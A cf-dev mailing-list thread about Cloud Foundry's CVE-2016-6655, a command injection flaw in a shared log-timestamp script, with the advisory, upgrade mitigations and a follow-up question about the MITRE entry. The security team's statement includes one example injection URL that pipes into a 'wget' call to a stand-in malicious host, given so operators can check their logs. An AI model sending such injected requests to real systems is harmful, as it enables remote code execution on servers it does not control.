Re: [security] CVE 2016-6655: Utility script command injection


Hector Rivas Gandara
 

Hello,

Thank you for reporting this.

I observed that the CVE in mitre.org did not get updated:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6655

How long does it take to get it updated?



On 17 October 2016 at 20:34, Molly Crowther <mcrowther(a)cloudfoundry.org>
wrote:

Hello all - many people were asking for more information, so we have
prepared the following statement regarding CVE-2016-6655:


Thanks,

Molly Crowther

CFF Security Team


------


This issue was discovered by the IBM BlueMix team and was responsibly
reported to the Cloud Foundry Foundation.

A common script shared by many Cloud Foundry components includes some code
responsible for prepending timestamps to component logs. This code is
vulnerable to command injection in any component that logs user-provided
data. Critically it is possible for an attacker to craft a request to
gorouter that can execute arbitrary code as the VCAP user on the gorouter
VM. Gorouter logs should be examined for examples of shell-escape sequences
if operators suspect that their system may have been compromised. An
example woud be to url-encode a pipe (“|”) character followed by a
malicious command as in: https://gorouter.your-cf.com/%7Cwget%20
http://something.malicious). Note that this is only one of a number of
ways which an attacker could invoke an arbitrary command via this
vulnerability.

Fixes were made to every CF component where this utility script is run.
Some components include this script but do not run it. Future updates will
remove the final unused instances of the vulnerable code to prevent
unintentional reintroduction.

Operators are strongly encouraged to upgrade to CF 245 or later and use
the most recent version of any standalone CF components.

For the original public notice regarding CVE-2016-6655, please see:
https://lists.cloudfoundry.org/archives/list/cf-dev@
lists.cloudfoundry.org/message/42YUJU2N27HBPFVMZR2QM7JI6YSEKORR/

On Mon, Oct 17, 2016 at 8:34 AM, Travis McPeak <tmcpeak(a)cloudfoundry.org>
wrote:

CVE 2016-6655: Utility script command injectionSeverity

Critical
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release versions prior to v245
-

cf-mysql-release versions prior to v31

Description

A command injection vulnerability was discovered in a common script used
by many Cloud Foundry components. A malicious user may exploit numerous
vectors to execute arbitrary commands on servers running Cloud Foundry.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v245 [1] or later


-

Upgrade to cf-mysql-release v31 [2] or later

Credit

This issue was discovered by IBM BlueMix.
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v245
-

[2] https://github.com/cloudfoundry/cf-mysql-release/releases/tag/v31


--
Regards
Hector Rivas | GDS / Multi-Cloud PaaS

Join cf-dev@lists.cloudfoundry.org to automatically receive all group messages.